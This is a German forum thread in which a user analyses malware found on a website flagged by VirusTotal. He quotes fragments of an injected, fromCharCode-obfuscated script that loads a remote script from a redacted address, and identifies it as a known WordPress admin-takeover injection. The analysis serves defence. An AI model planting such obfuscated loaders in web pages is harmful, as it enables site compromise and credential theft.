Frage zu Virus Total - Ergebnis

Dies ist der Treffpunkt für allgemeine Diskussionen.
Buntstift
Mitglied
Beiträge: 285
Registriert: Mi, 05. Feb 2014 14:49

Re: Frage zu Virus Total - Ergebnis

#16

Beitrag von Buntstift Themen-Starter » Mi, 03. Jan 2018 22:30

Danke. :klasse:

Casali
Mitglied
Beiträge: 119
Registriert: Sa, 09. Dez 2017 16:25

Re: Frage zu Virus Total - Ergebnis

#17

Beitrag von Casali » Do, 04. Jan 2018 12:22

Zitronella hat geschrieben:
Mi, 03. Jan 2018 22:23
siehe auch: https://sitecheck.sucuri.net/results/ww ... aktuell.de
Dieser Link liefert wesentlich mehr Informationen als der Screenshot zuvor. Aber weshalb hast du denn nicht die 10 Minuten spendiert, diese weiteren Infos auch zu geben?

Unter dem Link kann man sich die Payload anschauen. Sie beginnt mit

Code: Alles auswählen

<div class="td-a-rec td-a-rec-id-header "><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 115, 99, 
Wenn man die dekodiert, erhält man:

Code: Alles auswählen

var sscript = document.createElement("script");  
sscript.type = "text/javascript";  
sscript.src = "https://xxxxxx"; 
document.head.appendChild(sscript);
Den Link habe ich unkenntlich gemacht. Das Nachladen eines Scriptes ist nicht ungewöhnlich. Damit ist aber klar, dass der Befund auf einer Signatur beruht, vermutlich auf der Adresse der Domain, von der nachgeladen wird. Die ist anscheinend hinlänglich bekannt.

Das nachzuladende Script beginnt so:

Code: Alles auswählen

getmeone();
checkmeone();

   
 function putmeone()  {
	
		 var site = extractSummary(document.head.innerHTML);
		 if(site == "null") { return; }
		 var newuser_url = site+String.fromCharCode(119, ...
Weiter habe ich nicht geforscht. "Get me on" und "Check me on" sind ja schon fast selbstsprechend ;-).
Per Google findet man zu dem Script rasch eine bekannte Injection, deren Ziel es ist, Zugriff auf Admin Accounts von Wordpress-Seiten zu bekommen.
Demnach richtet sich die Malware in erster Linie gegen den Betreiber der Seite, um dort weiteren Zugriff zu bekommen.
Buntstift hat geschrieben:
Mi, 03. Jan 2018 22:17
Habe aber auch nichts anderes erwartet, da deren Support auch nur nach Lust und Laune arbeitet.
So wie ich das nach der kurzen Recherche sehe, sollte der Betreiber ein ernsthaftes Interesse haben. Er ist das Ziel - (noch) nicht die Besucher.

Buntstift
Mitglied
Beiträge: 285
Registriert: Mi, 05. Feb 2014 14:49

Re: Frage zu Virus Total - Ergebnis

#18

Beitrag von Buntstift Themen-Starter » Mo, 08. Jan 2018 18:24

Guten Abend.

Wollte mal eine Rückmeldung geben.

Den Laptop habe ich plattgemacht und neu aufgesetzt, läuft jetzt alles viel besser als zuvor.
Muss mir nur einen neueren Grafiktreiber suchen, sollte im Lenovoforum aber wohl was auffindbar sein.
Der Betreiber hat sich noch nicht geäussert aber jemand vom Support wollte sich der Sache annehmen.
Ich erhoffe mir da aber nicht viel, da dort viel gerredet wird aber passiert ist noch nie was.
Der Mitarbeiter vom Support ist nur ein freiwilliger Helfer und wird dort nicht viel erreichen können.

Antworten

Wer ist online?

Mitglieder in diesem Forum: Bing [Bot] und 2 Gäste